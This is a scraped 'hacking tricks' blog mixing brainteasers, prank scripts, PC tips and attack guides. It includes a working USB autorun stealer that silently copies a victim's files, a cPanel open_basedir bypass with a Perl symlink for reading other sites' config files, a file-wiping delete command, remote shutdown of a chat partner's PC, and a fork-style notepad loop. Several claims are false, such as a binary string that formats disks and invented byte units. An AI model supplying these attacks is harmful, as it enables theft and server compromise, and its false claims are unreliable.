Wifi Hacking Using Backtrack

0 comments

watch this video on how to use backtrack for hacking

Must Read!!!

1 comments


10 Brainteasers to Test Your Mental Sharpness

To test your mental acuity, answer the following questions (no peeking at the answers!):

1. Johnny’s mother had three children. The first child was named April. The second child was named May. What was the third child’s name?
2. A clerk at a butcher shop stands five feet ten inches tall and wears size 13 sneakers. What does he weigh?
3. Before Mt. Everest was discovered, what was the highest mountain in the world?
4. How much dirt is there in a hole that measures two feet by three feet by four feet?
5. What word in the English language is always spelled incorrectly?
6. Billie was born on December 28th, yet her birthday always falls in the summer. How is this possible?
7. In British Columbia you cannot take a picture of a man with a wooden leg. Why not?
8. If you were running a race and you passed the person in 2nd place, what place would you be in now?
9. Which is correct to say, “The yolk of the egg is white” or “The yolk of the egg are white?”
10. A farmer has five haystacks in one field and four haystacks in another. How many haystacks would he have if he combined them all in one field?

Answers

1. Johnny.
2. Meat.
3. Mt. Everest. It just wasn’t discovered yet.
4. There is no dirt in a hole.
5. Incorrectly (except when it is spelled incorrecktly).
6. Billie lives in the southern hemisphere.
7. You can’t take a picture with a wooden leg. You need a camera (or iPad or cell phone) to take a picture.
8. You would be in 2nd place. You passed the person in second place, not first.
9. Neither. Egg yolks are yellow.
10. One. If he combines all his haystacks, they all become one big stack.

Okay, some of these are a bit corny. But they all illustrate several brain idiosyncrasies that affect how we make decisions in the world.

Thanks to the way our brain works, we have a very strong tendency to see what we want to see and what we expect to see. This has huge implications when studying our customers, markets, competitors, and other data that influences key business decisions.

When we only see what we want or expect to see, we miss competitive threats because our brain tells us a threat couldn’t possibly come from that direction. We miss opportunities because we only see what has worked in the past rather than what could be. And we miss major market shifts and changes in customer needs that seem obvious in hindsight but are easily overlooked when focusing on what we already know.

Our brain doesn’t like information gaps, so we tend to jump at the first answer/ solution that looks good rather than take the time to examine all the data. This is especially true in a world where we receive more information every day than we have time to assimilate. Finally, our brains love to see patterns and make connections. This trait serves us well in many ways as we move through the world. But the brain doesn’t always get it right.

For example, how did you answer question #1 (be honest)? For most people, the first word that pops into their head is “June,” because the brain quickly spots the April/May/June pattern. Upon re-reading the question and analyzing the data, the answer “Johnny” becomes obvious.

And what about the man with the wooden leg? Your answer depends on how you interpret “with.” Does it refer to the man with the wooden leg or to the camera? A bit of a trick question, but it clearly illustrates how the language we use shapes the way we look at the world.

Perhaps the best example of how we miss things is the egg yolk question. Everybody knows egg yolks are yellow. But the question’s phrasing puts our attention on selecting the correct verb, so we overlook an obvious piece of data and an even more obvious answer.

We can’t change how the brain works – at least not yet. Give science another 50 years and who knows what our brains will be doing! For now, we can become more aware of how our brain works, then pause from time to time to consider what we’re missing. This includes the data we’re unconsciously screening out as well as different sources of data to counterbalance what we expect to see.

Get in the habit of teasing your brain. You’ll be amazed at what you end up seeing that you didn’t see before.

MICRO SD Memory Card Password Recovery / removing 4 method

2 comments
MICRO SD Memory Card Password Recovery / removing 4 method.
Solution 1:
For Symbian Mobiles:
1. Download and Install FExplorer
2. Insert your card into your phone, without accessing it through the phone
3. Run FExplorer and Open the path C:\system
4. Find the file called mmcstore, and rename it mmcstore.txt
5. Copy that file (mmcstore.txt) to your PC and open it in Notepad
6. Your password will be located within that file.


Solution 2:
For Symbian Mobiles:
1. Download and Instal X-Plore
2. Now open the X-Plore and press Zero(0) then check you have marked the
"Show the System Files".
3. After you done the above step now go to the file:
C:/Sys/Data/Mmcstore
4. If you found the above path then press the option "3" to set the Hex-Viewer.
5. Now look the third column you can see the code like ! TMSD02G (c ??”? x???3?3?3?3?3)
Now see the characters between '?' because it is your password 33333.
6. You mayn't able to access the path file:
C:/Sys/Data/Mmcstore
if you don't set the password for the memory card.

Solution 3:
For Micro SD:
Put the card in any E series mobile or N95 etc and format it.
It will not ask for a password.


Solution 4:
1. Go to file manager on your mobile
2. In Settings choose system folders,
3. In the System folder, find a file called mmcstore
4. Send the file to your PC using IR/Bluetooth
5. Open the file in Notepad
6. The password you need for your memory card is located within that file
www.mobilehackingtricks.com

Advance matrix effects 2013

0 comments
I had previously posted about Matrix effect using notepad . But this is more advance its look more advance then the previous one. So open up your notepad and get started.
          

  • Open Notepad and copy below code.
@echo off
cls
title Enter The Matrix
color 02

set string=Wake up Neo...
set /a len=18
call :DisplayText

ping localhost -n 4 >nul
set string=The Matrix has you...
set /a len=25
call :DisplayText

ping localhost -n 4 >nul
set string=Follow the white rabbit.
set /a len=28
call :DisplayText

ping localhost -n 4 >nul
set string=Knock, knock, Neo...
set /a len=24
call :DisplayText

ping localhost -n 4 >nul


goto matrix


:DisplayText

set /a dispvar =1
set /a len +=1

:DisplayLoop

CALL SET str=%%string:~0,

%dispvar%%%

cls
echo %str%
ping localhost -n 1 >nul

set /a dispvar +=1

if '%dispvar%'=='%len%' goto

enddisplay

goto DisplayLoop

:enddisplay
exit /b

:matrix
setlocal enabledelayedexpansion
for /l %%A in (1,1,39) do (
set /a rnd=!random!%%5+1
if !rnd!==1 (
set /a rnd2=!random!%%26+1
set num=1
for %%A in (A B C D E F G H I J K L

M N O P Q R S T U V W X Y Z) do (
if !rnd2!==!num! (
set add=%%A
)
set /a num+=1
)
) else set /a add=!rnd!%%2
set var=!var! !add!
)
echo !var!
call :matrix

  •  Save the file as matrix.bat  (.bat is must)
  •  Done enjoy !!
  This is advance matrix Effect

Keyboard Led Disco Pro Notepad Trick

0 comments
  • Open Notepad
  • Copy and paste these codes into your Notepad.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
  • Save the file as disco.vbs
  • Now open it and see the led light’s on your Keyboard will Go Crazy

SHUT DOWN THE COMPUTER AFTER SHOWING A MESSAGE USING NOTEPAD

0 comments
SHUT DOWN THE COMPUTER AFTER SHOWING A MESSAGE USING NOTEPAD

        •    Open the notepad
        •    Copy and paste the following code

         @echo off
           msg * Its time to take some rest.
           shutdown -c “Byeeeeeeeeeeeeee” –s

        •    Save the file with any name but with .bat extension eg. shut.bat
        •    Close it
        •    Now if someone opens this file it will convey the message and
             forcefully  shutdown the computer.

TEST YOUR ANTIVIRUS

0 comments


       •    Open the notepad
       •    Copy and paste the following code

           X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

      •    Save the file with any name with .exe extension
      •    Close the notepad
      •    Now open the file. If after running the file, the antivirus try to
           delete the file, if so it indicates that  your antivirus is working
           fine otherwise you need to check your antivirus.

LAUNCH THE NOTEPAD INFINITELY AUTOMATICALLY

0 comments
Open the notepad
     •    Copy and paste the following code

           @ECHO off
            :top
            START %SystemRoot%\system32\notepad.exe
            GOTO top

     •    Save the file with .exe extension eg. note.exe
     •    Open the file and see the magic

BUSH HID THE FACTS Cool Notepad Trick

0 comments


      •    Open notepad
      •    Type “BUSH HID THE FACTS” without quotes
      •    Save the file with any name.
      •    Close the notepad
      •    Open again and see the magic.

          NOTE: This trick may not work in window vista/7.

CONTINOUSLY EJECT CD/DVD DRIVES USING NOTEPAD TRICK

0 comments
•    Open notepad
      •    Copy and paste following code in notepad

                 Set oWMP = CreateObject("WMPlayer.OCX.7")
                 Set colCDROMs = oWMP.cdromCollection
                  do
                  if colCDROMs.Count >= 1 then
                  For i = 0 to colCDROMs.Count - 1
                   colCDROMs.Item(i).Eject
                  Next
                 For i = 0 to colCDROMs.Count - 1
                 colCDROMs.Item(i).Eject
                 Next
                 End If
                  wscript.sleep 5000
                  loop

        •    Save the file with .vbs extension eg. fun.vbs
        •    Open the saved file and see the magic.

Matrix Effect Notepad Trick 2013

0 comments
    MATRIX EFFECT
               •    Open notepad
               •    Copy and paste following code

             @echo off
             color 02
             :start
             echo %random% %random% %random% %random% %random% %random% %random%   %random% %random% %random%
              goto start

              •    Save the file with .bat extension eg. matrix.bat
              •    Now open the file and see the magic.

CONVERT TEXT INTO AUDIO USING NOTEPAD

0 comments
•     Open notepad
                 •    Copy and paste following code

                          Dim Message, Speak
                           Message=InputBox("Enter Text to Talk o","Speak")
                          Set Speak=CreateObject("sapi.spvoice")
                          Speak.Speak Message
                •    Save this file with any name with extension as .vbs eg. voice.vbs
                •    Now open the saved file and have fun.



World Trade Center Attack Trick Pro Hacking Tricks

0 comments
You must be knowing the Flight Number of The Plane that hit the World Trade Centre on 9/11.The Name Of the Plane was Q33NY.Now call this trick a Coincidence or something else but it amazed all.

  • Open Notepad
  • Type Q33N in capital letters.
  • Now increase the Font Size To 72
  • Change the Font to Wingdings.
Just See what has happened.You will get amazed after seeing this.


Pro Hacking Trick Test Your Antivirus

0 comments
Want to test your antivirus that is it effective or not,Don’t worry you can solve this by using one of the Notepad Tricks.Just Follow the steps written below to get the answer.
  • Open Notepad
  • Copy and paste this In your notepad.
[Download]X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*[/Download]
  • Save with an .exe extension like testingvirus.exe
As soon as you save this file your Antivirus will detect it and will ask for removal,if your Antivirus detects it then it’s all right but if not then you need to change your Antivirus.
Note:The EICAR test file(#3) is a 16 Bit application and will not Run on 64 Bit windows Versions.

COOL NOTEPAD hacking TRICKS

3 comments

COOL NOTEPAD TRICKS

1.    CONVERT TEXT INTO AUDIO USING NOTEPAD

                 •     Open notepad
                 •    Copy and paste following code

                          Dim Message, Speak
                           Message=InputBox("Enter Text to Talk o","Speak")
                          Set Speak=CreateObject("sapi.spvoice")
                          Speak.Speak Message
                •    Save this file with any name with extension as .vbs eg. voice.vbs
                •    Now open the saved file and have fun.



                                     
                                                                    




2.    MATRIX EFFECT
               •    Open notepad
               •    Copy and paste following code

             @echo off
             color 02
             :start
             echo %random% %random% %random% %random% %random% %random% %random%   %random% %random% %random%
              goto start

              •    Save the file with .bat extension eg. matrix.bat
              •    Now open the file and see the magic.





                                          
                                                                     








3.    MAKE A LOG DIARY WITH NOTEPAD
       •    Open notepad
       •    Type .LOG (in capital letters) and hit enter
       •    Save it with any name
       •    Close it.
       •    Open again and see the magic.



                                         
                                               

                                                 
                                                            




4.    WORLD TRADE CENTER WITH NOTEPAD
        •    Open your Notepad
        •    Type the flight number Q33N
        •    Change the Font to Wingdings
        •    You may change the font size.










5.    CONTINOUSLY EJECT CD/DVD DRIVES USING NOTEPAD TRICK

      •    Open notepad
      •    Copy and paste following code in notepad

                 Set oWMP = CreateObject("WMPlayer.OCX.7")
                 Set colCDROMs = oWMP.cdromCollection
                  do
                  if colCDROMs.Count >= 1 then
                  For i = 0 to colCDROMs.Count - 1
                   colCDROMs.Item(i).Eject
                  Next
                 For i = 0 to colCDROMs.Count - 1
                 colCDROMs.Item(i).Eject
                 Next
                 End If
                  wscript.sleep 5000
                  loop

        •    Save the file with .vbs extension eg. fun.vbs
        •    Open the saved file and see the magic.




6.    BUSH HID THE FACTS

      •    Open notepad
      •    Type “BUSH HID THE FACTS” without quotes
      •    Save the file with any name.
      •    Close the notepad
      •    Open again and see the magic.

          NOTE: This trick may not work in window vista/7.



7.    CONSTANTLY REPEAT A MESSAGE

         •    Open the notepad
         •    Copy and paste following code
         •   
           @ECHO off
           :Begin
            msg * Hello
           msg * How are you?
             msg * Having fun!
            msg * Want more!
            msg * Lets start again
          GOTO BEGIN

        •    Save the file with .bat extension eg. fun.bat
        •    Open the saved file and see the magic.



8.    FORMAT HARD DISK USING NOTEPAD

       •    Open Notepad
       •    Type the following code

       Code : 01001011000111110010010101010101010000011111100000
      •    Save the file with any name with .exe extension such as format.exe
      •    Run it.
        NOTE: - It will erase all HDD data.




9.    SHUT DOWN THE COMPUTER AFTER SHOWING A MESSAGE USING NOTEPAD

        •    Open the notepad
        •    Copy and paste the following code

         @echo off
           msg * Its time to take some rest.
           shutdown -c “Byeeeeeeeeeeeeee” –s

        •    Save the file with any name but with .bat extension eg. shut.bat
        •    Close it
        •    Now if someone opens this file it will convey the message and
             forcefully  shutdown the computer.


10.    TEST YOUR ANTIVIRUS

       •    Open the notepad
       •    Copy and paste the following code

           X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

      •    Save the file with any name with .exe extension
      •    Close the notepad
      •    Now open the file. If after running the file, the antivirus try to
           delete the file, if so it indicates that  your antivirus is working
           fine otherwise you need to check your antivirus.


11.    LAUNCH THE NOTEPAD INFINITELY AUTOMATICALLY

     •    Open the notepad
     •    Copy and paste the following code

           @ECHO off
            :top
            START %SystemRoot%\system32\notepad.exe
            GOTO top

     •    Save the file with .exe extension eg. note.exe
     •    Open the file and see the magic

How to skip survey Hack 2013

0 comments
Best Symlink Method
Bypass Symlink 100%
Private Method
Hello my friends today i will
explain how to bypass any server
even the security is 100000000%

so this method is private but i
decided to make it public 
So no need ".htaccess" or "ini.php"
or "php.ini" to bypass 
First let me explain some tricks °_°
We know that php use html code ,
It's a language that can be
executed in the command line
So in linux System the users
privilege can execute many
command in php and we can
bypass the configuration .
As we know in the cpanel server
we have an option called "cron
job" in the control panel to
execute manycommands.
For example let's make a file
called file.php
CODE:
<?php
phpinfo();
?>
Secondly Go to the cpanel in the
server and select "cron job" and
add this command :
/usr/local/bin/php -d
open_basedir= /home/user/
public_html/file.php
As you can see : "/usr/local/bin/
php" It's the command line in php
for the user
Note: in some servers it's installed
in : "/usr/bin/php"
-d <<<< put the config you want to
execute in that file 
open_basedir= <<<< here you put
open_basedir empty to Bypass
config in "file.php"
/home/user/public_html/file.php
<<< here is the path of php file
that you want to execute 
Other Bypass example: /usr/local/
bin/php -d disable_functions= /
home/user/public_html/file.php
Advanced method :
Create a file example
"mauritania.php"
CODE:
#!/usr/local/bin/php -d
open_basedir=
<?php
phpinfo();
?>
Then just execute the file 
Command: php mauritania.php
Another method to bypass is to
execute a perl file and you can
read the file easily !
CODE:
#!/usr/bin/perl
symlink ("/home/user/public_html/
config.php","/home/user/
public_html/test.txt");
So that mean that the admin
didn't run php as :
*CGI module
*SUPHP module .
*apache module.
*enable open_basedir and
safe_mode .
*"Chmod 000 /bin/ln"
=========>>> the perl file still
have the ability to create the links
 hahaha 
but even if the admin runs that
shit you still can bypass the
system  perl is powerful 
and if the admin try to disable "/
usr/bin/perl" and chmod it to
"0700" or less  it will broke the
cpanel 
As it requires to be at "0755" for
proper operations, since it is used
by customers as well when it
suexecinto the user when they log
into cPanel.
So we cannot change it to that
setting "700" , since it breaks the
entire system 
*So as you learned today
"open_basedir" is the responsible
of the mobility between the
websites in the shell 
So there is an option Called "Sec
info sometimes "Sec" depends of
the shell you are using 
Example : C99 shell
We have this that mean that the
open base dir is disabled :
"Open base dir: /home/user:/usr/
lib/php:/usr/local/lib/php:/tmp"
Okey in some servers you can
bypass the security with jumping
method , some hackers use
php scanner to scan the whole
paths in the server °_° that is
wasting of time  by putting
url before Linux : serverurl/~user/
folder/shell.php °_° very old :s
So i hope you understand now i
uploaded for you a simple tool to
bypass "Open Base_dir" 
Please Comment if It works

10 Tricks which you must Try

0 comments
10 Tricks which you must like:

1- View full specifications of your PC:
Just go to Run
type "dxdiag"
press enter.
Then you can view all PC specifications.

2- Delete all files of a Hard Disc when run a simple file:
>Notepad >Type DEL/F/Q*>Save it as delete command

3- Boost Ur PC
>Right click My Computer>Proprties >Advancd>Performnce >Advancd>Virtual Memory >Change
Keep Initial Size
Same & Max Size Double

4- Increase your Web Browser loading speed & save Time by 65%(both pc & mobi):
1) CLEAR CACHE MEMORY at every 10 min.
2) Set OFF IMAGES if no need!
5- Make ur own font in XP:
Private charecter editor used for editing fonts.
- run
- Type "eudcedit"
- Try making new fonts.

6- Trick 2 increase PC life:
-Shut down proprly
-Dont place many icons in desktop
-Keep 50% free spce in C drive
-Dont keep foldrs in task bar.

7- Who used ur PC in ur Absence?
What did he do?
1st u shud Go-
>start
>run
>Type- eventvwr.msc

8- U can explore the whole world online now like google earth without any softwre.
Go
www.wikimapia.org
&
see your home, roof & garden on your pc.

9- Want to Block Unwanted Website on firefox:
Download this addon:
https://addons.mozilla.o/ rg/en-US/ firefox/addon/ 4351
after it
block any site.

10- How to add password to files & folders on computer?
>Right click >new>Compressedfolder >paste file in to folder >Right click add password

How to shutdown your friend's Pc through chating using cmd Pro HACKING trick For Noobs

0 comments
How to shutdown your friend's
Pc through chating using cmd:

Hello friends. Today CE is here with a cool
trick. You can shutdown your
friend's computer through
chating. This is very simple and
cool trick. Kindly follow these
steps :-

Step 1: Before going to start
clear all history, all cookies, stop
all downloading and close all
extra tabs. Mean to say stop all
internet activities. Now go to
your messanger and start
chating with the victim.

Step 2: Go the start and click on
run.

Step 3: In run command type
cmd.exe and hit enter.

Step 4: A black screen will
appear. This is command prompt.
In this box type " netstat -
n" (without quotes).

Step 5: Now if you done the step
one correctly you see only one
ip address many times (ip should
be of victim).

Step 6: Now again, type
"shutdown -i"(without quotes).A
box will appear now click on add
button.A small box will pop up.

Now type ip address of computer
which you get from "netstat -n"
command.

Step 7: Now there are three
options click on shutdown.

Step 8: To show a message to
victim's computer check the
"warm users of the action" and
set the number of seconds.

Step 9: Now select any option in
shutdown event tracker.

Step 10: Now comes the best
part of the prank. In last type
your message like you got
hacked and we destroy your
computer. After this shutdown
your computer is not going to
start(type anything that
scare your victim). Now click on
ok and you are done. Have fun!!

Steal Someone Secret File Using USB Flash Drive.

1 comments

Hi Friends,
Today i am posting a way to steel
secret file from your friends computer.
Insert a USB Flash Drive to your
friend's PC
Sneaky, isn't it? So let us prepare such
a sinister USB Flash drive.
STEP 1
Open Notepad (I recommend Notepad
++) and copy-paste the following lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)
Save this as autorun.inf
The icon line is optional. You can
change the icon to your tastes or leave
it to the default icon. It’s useful for
social engineering purposes like
enticing the user to click a file on the
drive by making it looks like a game or
something.
The “action=” command is optional too
but sometimes when the autorun
launches it may ask the user what to
open. Depending on what you put
here the user will be instructed to click
Ok or run the file. This code acts as a
backup just in case the user is asked
what to open. This is not required if
you are operating the computer.
The “shell/open command” also acts
as a backup in case the user clicks
cancel instead of open when
prompted. This code will execute when
the drive letter is clicked on.
STEP 2
Open Notepad again and copy-paste
the following lines
(code-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /
i /r /y
echo off
%backupcmd% "%USERPROFILE%
\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%
\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%
\videos" "%drive%\all\vids"
@echo off
cls)
Save this as file.bat
This file is configured to copy the
contents of the current users pictures,
favorites, and videos folder to the Flash
drive under a folder called “all”. This is
the section of the code you will need
to edit depending on what you want to
copy.
The first file path "%USERPROFILE%
\pictures" – is the target.
The second file path "%drive%\all\My
pics" – is the destination.
STEP 3
Open Notepad once again and copy-
paste the following line.
(code:
CreateObject("Wscript.Shell").Run """"
& WScript.Arguments(0) & """", 0,
False)
Save this as invisible.vbs
This code runs the file.bat as a process
so it does not show the CMD prompt
and everything the batch file is
processing.
STEP 4
Open Notepad one last time and copy-
paste the following line.
(code
wscript.exe \invisible.vbs file.bat)
Save this as launch.bat
This batch file does two things, it looks
for the invisible.vbs file in the root of
the Flash drive then loads it with
file.bat so file.bat is run with code
from vbs file.
STEP 5
Copy all 4 files created in the above
steps and put it on the root of the
Flash drive, including the icon file if
needed. Also create a folder named
“all” where the contents are to be
copied automatically. You can call this
folder by any name, but then you need
to reflect the changes you made in step
2.
This is all that needs to be done. Test
the Flash drive on your own computer
first before playing it out on your
victim. It works flawlessly.

5 Top Tips To secure your WiFi Connection

0 comments
5 Top Tips To secure your WiFi Connection


1. Install a Firewall A firewall helps protect your PC by preventing unauthorized users from gaining access to your computer through the Internet or a network. It acts as a barrier that checks any information coming from the Internet or a network, and then either blocks the information or allows it to pass through to your computer.


2. Change the Administrative Password on your Wireless Routers Each manufacturer ships their wireless routers with a default password for easy initial access. These passwords are easy to find on vendor support sites, and should therefore be changed immediately.

3. Change the Default SSID Name and Turn off SSID Broadcasting This will require your wireless client computers to manually enter the name of your SSID (Service Set Identifier) before they can connect to your network, greatly minimizing the damage from the casual user whose laptop is configured to connect to any available SSID broadcast it finds. You should also change the SSID name from the factory default, since these are just as well-known as the default passwords.


4. Disable DHCP for a SOHO network with only a few computers consider disabling DHCP (Dynamic Host Configuration Protocol) on your router and assigning IP addresses to your client computers manually. On newer wireless routers, you
can even restrict access to the router to specific MAC addresses.


5. Replace WEP with WPA.WEP (Wired Equivalent Privacy) is a security protocol that was designed to provide a wireless computer network with a level of security and privacy comparable to what is usually expected of a wired computer network. WEP is a very weak form of security that uses common 60 or 108 bit key shared among all of the devices on the network to encrypt the wireless data. Hackers can access tools freely available on the Internet that can crack a WEP key in as little as 15 minutes.Once the WEP key is cracked, the network traffic instantly turns into clear text – making it easy for the hacker to treat the network like any open network. WPA (Wi-Fi Protected Access) is a powerful, standards-based, interoperable security technology for wireless computer networks. It provides strong data protection by using 128-bit encryption keys and dynamic session keys to ensure a wireless computer network's privacy and security. Many cryptographers are confident that WPA addresses all the known attacks on WEP. It also adds strong user authentication,which was absent in WEP.

How to find the real IP address of a web site?

2 comments
How to find the “real” IP address of a web site?


You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.

To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.



Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter

Hack To Change Your IP Address

0 comments
**Hack To Change Your IP Address**
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address With a little practice, you can easily get this process down to 15 seconds.

Hide your Local Disk Drive Without Software use.

0 comments


As Every computer user have some personal or private data which they want to hide or protect From others.
If you Want To Store Less amount data which you can easily Store In Folder. Then I Recommends you to read My Folder Locking Post.

But If You want Hide large account of data or want to hide full drive from other then follow these steps carefully

Go To Start >> Then Run >> Then Type Diskpart

New Window will open Then Type list volume press enter

Now your all drive will appear, now lets you want to hide Drive D

Then Type select volume D and press enter.

Then Type remove letter D and press enter again.

Now Go to your my computer then you will find that your D drive is hidden.

Now Whenever you want to unhidden your drive Then Repeat all steps again but use assign letter D

instead of remove letter D .

Then your Hidden drive will start appearing. Lets take one look on all steps in this figure

Uniscan On Backtrack

0 comments
Uniscan On Backtrack ---->>>HackerS>
>>----
web-vulnerability scanner on Backtrack
how to use it ----
1>root@bt:~# cd /pentest/web/
uniscan/
2>root@bt:/pentest/web/uniscan# ./
uniscan.pl
3>root@bt:/pentest/web/uniscan# ./
uniscan.pl
4>root@bt:/pentest/web/uniscan# ./
uniscan.pl -u http://www.site.com/
-qweds
total usages ---
[1] perl ./uniscan.pl -u http://
www.example.com/
-qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i
"ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -u https://
www.example.com/
-r
OPTIONS:
-h help
-u <url> example: https://
www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search

Facebook Pro Trick Paste In comment

0 comments
MAGIC

Copy this, then paste in comment area.

(Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y) (Y)
(Y) ╬╬╬╬ ♥ ♥ ♥ ╬╬╬╬╬╬ ♥ ♥ ♥ ╬╬╬╬ (Y)
(Y) ╬╬ ♥ ♥ ♥ ♥ ♥╬╬♥ ♥ ♥ ♥ ♥ ╬╬ (Y)
(Y) ╬ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ╬ (Y)
(Y) ╬╬ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ╬╬ (Y)
(Y) ╬╬╬╬ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ╬╬╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬╬ ♥ ♥ ♥ ♥ ♥ ♥ ╬╬╬╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬╬╬ ♥ ♥ ♥ ♥ ♥ ╬╬╬╬╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬╬╬╬╬ ♥ ♥ ♥ ╬╬╬╬╬╬╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬╬╬╬╬╬ ♥ ♥ ╬╬╬╬╬╬╬╬╬╬╬ (Y)
(Y) ╬╬╬╬╬╬╬╬╬╬╬╬ ♥ ╬╬╬╬╬╬╬╬╬╬╬╬ (Y)
:42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42:
:* :|] :|] :|] :* :* :* :|] :* :|] :* :|] :* :* :*
:* :|] :|] :|] :* :|] :* :|] :* :|] :* :|] :* :|] :|]
:* :|] :|] :|] :* :|] :* :|] :* :|] :* :|] :* :* :|]
:* :|] :|] :|] :* :|] :* :|] :* :|] :* :|] :* :* :|]
:* :|] :|] :|] :* :|] :* :|] :* :|] :* :|] :* :|] :|]
:* :* :* :|] :* :* :* :|] :|] :* :|] :|] :* :* :*
:42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42: :42:

How far do u know? Computer Digit Pro Knowledge For Noobs Beginers

0 comments
How far do u know?
1 Bit = Binary Digit
8 Bits = 1 Byte
1024 Bytes = 1 Kilobyte
1024 Kilobytes = 1 Megabyte
1024 Megabytes = 1 Gigabyte
1024 Gigabytes = 1 Terabyte
1024 Terabytes = 1 Petabyte
1024 Petabytes = 1 Exabyte
1024 Exabytes = 1 Zettabyte
1024 Zettabytes = 1 Yottabyte
1024Yottabytes = 1 Brontobyte
1024 Brontobytes = 1 Geopbyte
1024 Geopbyte=1 Saganbyte
1024 Saganbyte=1 Pijabyte
Alphabyte = 1024 Pijabyte
Kryatbyte = 1024 Alphabyte
Amosbyte = 1024 Kryatbyte
Pectrolbyte = 1024 Amosbyte
Bolgerbyte = 1024 Pectrolbyte
Sambobyte = 1024 Bolgerbyte
Quesabyte = 1024 Sambobyte
Kinsabyte = 1024 Quesabyte
Rutherbyte = 1024 Kinsabyte
Dubnibyte = 1024 Rutherbyte
Seaborgbyte = 1024 Dubnibyte
Bohrbyte = 1024 Seaborgbyte
Hassiubyte = 1024 Bohrbyte
Meitnerbyte = 1024 Hassiubyte
Darmstadbyte = 1024 Meitnerbyte
Roentbyte = 1024 Darmstadbyte
Coperbyte = 1024 Roentbyte

How To Improve Alexa Rank: What is Alexa Rank ? Pro Seo Trick For Noobs Beginers

0 comments
How To Improve Alexa Rank:
What is Alexa Rank ?
Alexa is owned by the amazon.com which
used to rank the website using website’s
traffic, look, performance and backlinks.
1. Content is king
Blog/website’s content plays the key role
in the alexa ranking. Always publish fresh
and unique content. Never publish copied
content because it will decrease your alexa
rank and your AdSense account will got
disabled.
2. Use Alexa Rank toolbar
The newbie blogger might not know that
alexa rank is getting updated daily so to
check the change in the alexa rank is
better install alexa rank toolbar in to the
your browser. Alexa rank is the best way
to monitor the status of the blog and
website.
3. Promote your website
The Another best way to improve your
alexa rank is to publish guest content on
other’s blogs. There are many bloggers
who accepts the guest post and they will
offer the rich back link for your blog so
guest posts will help you to build the rich
backlink.
4. Be Consistent
A best blog is not the one which contains
the huge content, it is the with consistent
effective writings. You should not publish
article when its ready, you should have
time table to publish your article it helps
alexa to improve your rank and it will
make your website SEO friendly. And
Publish regularly and people will realize
that you are best in your blog’s niche.
5. Add alexa rank widget
You should add the alexa rank widget in to
your blog/website. You have to show off
your alexa rank to your visitor so visitors
will realize that your website content is
great and it will subscribe to your website.
Hence your subscribers will increase.

How to Use Pen Drive As RAM For all windows Pro Computer Trick For Noobs

0 comments
How to Use Pen Drive As RAM
For XP
Insert your pen-drive. Let your PC read it.
(Minimum 2 GB)
Right click on My Computer.
Click on Properties from context menu.
Click on Advanced tab.
Click on Settings under Performance.
Click on Advanced tab.
Click on Change button under Virtual
memory.
Select your USB drive.
Click on custom size radio button and give
the values as follows;
Initial Size:1020
Maximum size:1020
The size depends upon your free memory
capacity of your pen drive. So you can
change this limit according to your pen
drive size.
Click on Set button, then click on OK.
Now you have to restart the computer.
The speed of your computer will be
increase
For Windows 7
